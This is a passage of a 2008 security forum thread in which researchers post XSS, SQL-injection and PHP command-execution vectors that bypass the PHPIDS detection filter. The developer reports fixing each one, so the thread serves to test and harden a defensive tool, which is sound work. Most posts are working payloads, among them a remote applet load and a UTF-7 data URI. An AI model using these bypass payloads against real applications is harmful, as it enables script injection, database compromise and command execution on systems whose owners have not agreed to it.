Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1415161718192021222324...LastNext
Current Page: 19 of 31
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: kuza55
Date: February 26, 2008 11:58PM

I don't really follow this thread, so I have no idea if this has been mentioned before, but sometimes you don't need to be able to execute code to execute code, if you know what I mean, e.g.

document.domain=name (set name to com or org or net, or whatever the TLD is)

seems to get past the filter on php-ids.org

Also, you can make it even simpler by overwriting an object inside the window object (i.e. something global), so you don't need the dot, e.g.

location=name (set name to javascript:whatever)

but that doesn't get past the filter, since you seem to flag on location=

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 27, 2008 06:18AM

Hi kuza55!

Yep - I dunno why domain was left out in the rules - it is now included. We had a seripous wave of $=property injections several months ago but those issues should be fixed.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: February 29, 2008 08:52AM

The = ' XSS without being noticed '.constructor.constructor
The ( decodeURI( 'aler%74%281%29' ) )
()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 29, 2008 04:51PM

Fixed six hours ago :)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: February 29, 2008 07:10PM

constructor attacks again: http://p42.us/phpids/62.html

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: March 01, 2008 06:37AM

1' *( @a)or 1 LIKE '1 http://demo.php-ids.org/?test=1'%20*(%20@a)or%201%20LIKE%20'1
1'%column LIKE'0 http://demo.php-ids.org/?test=1'%column%20LIKE'0
aa'%@var -1 or 1 SOUNDS LIKE(1)|'+1
1'&&column or'1 http://demo.php-ids.org/?test=1'%26%26column%20or'1
1'%column or 1 LIKE '1
1'< column or 1 LIKE'1
...
vuln operands: %, <, ^, /, &

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: March 01, 2008 09:07AM

Script attack + Thornmakers $ bypass:-
http://www.businessinfo.co.uk/labs/phpids/phpids1.html

Because I can't be bothered uploading a file each time I create a window.name payload, I've created a simple bookmarklet:-
javascript:namePayload=prompt('Enter payload');url=prompt('Enter url');html = '<iframe src="http://demo.phpids.org/?test='+url+'" name="'+namePayload+'"><\/iframe>';self.location="data:text/html,"+html;

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 03/03/2008 03:27AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 01, 2008 02:07PM

Wow - what a hailstorm ;) And all of them are pretty hard to fix. I will ping back if the problems are solved - thx!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 01, 2008 02:55PM

Phew - tough ones but all fixed. The XSSes even got a whole new rule because I think the constructor thing has more potential...

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: March 01, 2008 03:09PM

new bug:

1' -1 or '1 http://demo.php-ids.org/?test=1'%20-1%20or%20'1
1' -1 - column or '1
1' -1 or+1= '+1

greetings :)



Edited 1 time(s). Last edit at 03/01/2008 03:14PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 01, 2008 05:46PM

Phew - nice and fixed ;)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: March 01, 2008 11:36PM

http://p42.us/phpids/63.html
the injection is:
x=1+name
eval(x)
which only works when passed in as a url parameter. Looks like a bug.

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: March 02, 2008 06:06AM

fixes seem fine to me, good work :)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: March 03, 2008 03:26AM

@thornmaker: A bug indeed - the input from the textarea is automatically using a carriage return AND a line break while the url example exclisively uses a line break. Fixed!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: April 25, 2008 04:26AM

Maybe exploitable, works in IE I think

document.charset='UTF-7'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: April 26, 2008 12:15PM

Yep - it works. Could be handy if content length restrictions apply and other parameters get reflected later. 10x!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: May 10, 2008 11:49PM

bypass: (x)setter=0?0.:alert,x=0

notes: I can't figure out how to turn the alert into an two stage eval. The best I can come up with is this which has an overall impact of 3. While I'm at it, this one almost works too and has an overall impact of 4. Maybe someone can improve on them...

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: fragge
Date: May 11, 2008 06:38PM

thornmaker Wrote:
-------------------------------------------------------
> bypass: (x)setter=0?0.:alert,x=0

NICE. crazy O_O

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 13, 2008 06:37AM

Wow - nice ones. fixed in rev .888 - 0.4.8 is close ;) Thanks!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 20, 2008 01:14AM

200,000, home, stop,back, blur, print,Script ('scroll,\valert(1),scroll')
()

Also works with:-
200,000, home, stop,back, blur, print,Script ('scroll,\veval(\vname),scroll')
()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/20/2008 01:16AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: thornmaker
Date: May 20, 2008 01:35AM

\v ftw!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 20, 2008 07:43AM

Here's almost a pure XSS:-
Input not considered malicious by the PHPIDS will be displayed unfiltered - input considered malicious will be displayed sanitized<applet/src/type=
text/html onload=200,000,home,stop,back,blur,print,Script(code)() code=ale alt=rt(1) Input not considered malicious by the PHPIDS will be displayed unfiltered - input considered malicious will be displayed sanitized

I really need to get back to work now so if anyone wants to try and improve the vector above then please do

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 20, 2008 08:40AM

Scary no?

<applet/src=http://businessinfo.co.uk/labs/xss.html
type=text/html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 21, 2008 04:24AM

Scary indeed - and fixed. I didn't expect either the vertical tab issue nor that applets wouldn't be detected... 0.4.8 as soon as I am back home from Belgium ;)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 23, 2008 02:47PM

Impact of 5:-

<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

I tried to bypass with loads of variations maybe this isn't exploitable with the current data: reg exp rule but I've posted it cause I thought it was cool.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: May 25, 2008 08:02AM

Hi .mario!
as discussed, php command execution when eval'd:

if(`any command`) die(); (php-ids)

greetings,
Reiners

edit: hmm, well, if you can inject directly into a eval() there are a lot of other vectors, so I guess you dont intend to take care of these anyway ;)



Edited 1 time(s). Last edit at 05/25/2008 09:54AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 25, 2008 02:08PM

Hey guys - I just returned home. Will take care asap!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 26, 2008 03:15AM

@Gareth: Hmmm - I am getting an Impact of 16... but nice vector anyway ;)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 26, 2008 04:29AM

@mario

Impact 5:-
XSS without being noticed<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

Bypass data but hit entity rule (impact 5):-
XSS without being noticed<a/href=da&#x74&#000000097:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 26, 2008 07:03AM

@gareth: Yuk - found it - it was a bug in the UTF7 detection. Fixed, thx!!

Options: ReplyQuote
Pages: PreviousFirst...1415161718192021222324...LastNext
Current Page: 19 of 31


Sorry, only registered users may post in this forum.